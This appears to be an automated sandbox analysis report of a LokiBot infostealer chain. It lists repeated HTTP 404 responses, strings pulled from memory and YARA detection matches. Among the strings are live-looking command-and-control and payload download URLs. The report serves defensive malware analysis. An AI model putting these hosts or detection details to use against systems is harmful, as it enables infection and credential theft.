                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:29 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:30 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:32 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:33 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:33 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:33 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:35 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:38 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:42 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:43 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:44 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:45 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:46 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:46 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:47 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:48 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:50 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:51 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:52 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:53 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:54 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:55 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:56 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:56 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:57 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:58 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:59 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:00 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:01 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:02 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:04 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:08 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:09 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:10 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:11 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:12 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:13 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:14 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:15 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:17 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:18 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:19 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:20 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:21 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:22 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:22 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:23 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:24 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:25 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:26 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:27 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:28 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:29 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:30 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:30 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:31 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:32 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:33 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:34 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:35 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:36 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:37 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:39 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:40 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:41 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: screens.pif, 00000005.00000002.2659632439.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, screens.pif, 00000005.00000002.2658959804.000000000049F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://freighteighttwocam.ddns.net/mdifygidj/five/fre.php
                Source: powershell.exe, 00000000.00000002.1487508963.0000027825C2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                Source: powershell.exe, 00000000.00000002.1536953245.0000027834D45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: powershell.exe, 00000000.00000002.1487508963.0000027824CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                Source: powershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: screens.pif, screens.pif, 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: powershell.exe, 00000000.00000002.1487015359.0000027824BD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                Source: powershell.exe, 00000000.00000002.1541215638.000002783CF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                Source: powershell.exe, 00000000.00000002.1541077857.000002783CD90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co7
                Source: powershell.exe, 00000000.00000002.1487508963.00000278255C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sodiumlaurethsulfatedesyroyer.com
                Source: powershell.exe, 00000000.00000002.1487508963.0000027824CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1487508963.00000278262FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                Source: powershell.exe, 00000000.00000002.1487508963.00000278262FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                Source: powershell.exe, 00000000.00000002.1536953245.0000027834D45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000000.00000002.1536953245.0000027834D45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000000.00000002.1536953245.0000027834D45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000000.00000002.1487508963.0000027825C2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000000.00000002.1536953245.0000027834D45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000000.00000002.1487508963.00000278255BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sodiumlaurethsulfatedesyroyer.com
                Source: powershell.exe, 00000000.00000002.1487060690.0000027824BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sodiumlaurethsulfatedesyroyer.com/N
                Source: powershell.exe, 00000000.00000002.1485393170.0000027822A18000.00000004.00000020.00020000.00000000.sdmp, Comprobante.lnk.lnkString found in binary or memory: https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrg
                Source: powershell.exe, 00000000.00000002.1541215638.000002783CF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sodiumlaurethsulfatedesyroyer.com/ow
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49706 version: TLS 1.2

                System Summary

                barindex
                Source: 4.2.screens.pif.49889b8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 4.2.screens.pif.49889b8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 4.2.screens.pif.49889b8.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 4.2.screens.pif.49889b8.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 4.2.screens.pif.49889b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 4.2.screens.pif.49889b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 4.2.screens.pif.49889b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 4.2.screens.pif.49889b8.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 4.2.screens.pif.49889b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 5.2.screens.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 5.2.screens.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 5.2.screens.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 5.2.screens.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.screens.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 5.2.screens.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 5.2.screens.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 5.2.screens.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
